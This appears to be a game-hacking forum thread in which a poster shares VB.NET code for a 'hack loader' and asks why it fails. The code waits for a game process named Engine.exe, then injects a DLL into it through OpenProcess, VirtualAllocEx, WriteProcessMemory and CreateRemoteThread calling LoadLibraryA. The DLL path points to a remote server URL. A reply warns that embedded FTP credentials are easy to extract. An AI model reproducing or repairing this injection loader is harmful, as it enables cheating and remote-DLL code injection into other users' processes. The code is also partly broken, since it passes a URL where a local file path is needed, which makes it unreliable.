Advanced Hack Loader FTP !
Want to Make a Hack Loader. Due to the site DLL.
Code:
Private Sub Inject()
On Error GoTo 1
Timer1.Stop()
Dim TargetProcess As Process() = Process.GetProcessesByName("Engine.exe")
TargetProcessHandle = OpenProcess(PROCESS_CREATE_THREAD Or PROCESS_VM_OPERATION Or PROCESS_VM_WRITE, False, TargetProcess(0).Id)
pszLibFileRemote = "http://***/hack.dll"
pfnStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
TargetBufferSize = 1 + Len(pszLibFileRemote)
Dim Rtn As Integer
Dim LoadLibParamAdr As Integer
LoadLibParamAdr = VirtualAllocEx(TargetProcessHandle, 0, TargetBufferSize, MEM_COMMIT, PAGE_READWRITE)
Rtn = WriteProcessMemory(TargetProcessHandle, LoadLibParamAdr, pszLibFileRemote, TargetBufferSize, 0)
CreateRemoteThread(TargetProcessHandle, 0, 0, pfnStartAddr, LoadLibParamAdr, 0, 0)
CloseHandle(TargetProcessHandle)
1: Me.Close()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If IO.File.Exists("http://***/hack.dll") Then
Dim TargetProcess As Process() = Process.GetProcessesByName("Engine.exe")
If TargetProcess.Length = 0 Then
TextBox1.Text = ("Waiting for Engine.exe...")
Else
Timer1.Stop()
TextBox1.Text = "Injected!"
Call Inject()
End If
Else
Label1.Text = ("Can't find DLL on server")
End If
End Sub
But I found a code does not work. ^^
Help!
What are you trying to do? download a hack and then inject it?
FTP >> Very unsafe, people can easily reverse your .net app and get FTP credentials.